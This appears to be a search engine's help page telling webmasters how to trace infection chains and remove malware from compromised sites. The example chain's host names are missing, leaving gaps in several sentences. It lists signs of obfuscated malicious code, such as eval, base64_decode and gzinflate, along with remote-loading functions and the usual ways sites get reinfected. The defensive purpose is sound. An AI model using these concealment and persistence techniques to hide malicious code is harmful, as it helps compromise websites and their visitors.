Infection chains

Yandex can provide information about host chains that infect users' computers to help webmasters locate and remove malware from their sites.

This information can be used to determine which page element on the infected site runs the malware.

For example, if the chain appears as follows:

you must take the following actions to stop malware distribution from the site:

  • delete the part of the webpage or script that adds infected-2.htm elements to the page (<script> or <iframe>), which loads the page block from or redirects to this site

  • request the owners of to stop the site from using page elements, that in turn download elements from;

  • terminate the distribution of malware from

The web server malware that writes the tag to the page, which in turn downloads the element from or redirects to may be disguised in the following ways:

  • intentionally made incomprehensible or unreadable - we recommend you look for sections of script that you didn't write, especially those lacking structure or indents;

  • encoded – gibberish characters and the use of eval, base64_decode, gzuncompress, gzinflate, ob_start, str_rot13, assert, create_function, preg_replace functions often indicate encoded script;

  • hidden in .htaccess constructions and other web server, script interpreter, template or CMS setting config files.

  • it may be dynamically loaded from a third-party web server (file_get_contents, curl_exec php functions etc.).

Once deleted, web server malware may reappear for the following reasons:

  • the presence of a web server backdoor;

  • stolen or hacked web server (FTP, SSH), host admin panel and CMS passwords;

  • the server may have been hacked by changing the user root password or adding new users with the necessary privileges;

  • the webmaster's computer may contain a backdoor or bot that may be used remotely to issue server commands or edit webpages in the webmaster's name.

Web browser malware may be disguised (obfuscated) in a similar fashion. The eval, document.write, document.location, document.URL, window.location, window.navigate constructions may be used, DOM elements overridden, items loaded using the <object> and <embed> tags, ActiveX, as well as changing the page code and DOM using scripts and other page elements. In addition, look out for excessively long scripts and superfluous string operations, for example, reassigning or combining several scripts into one.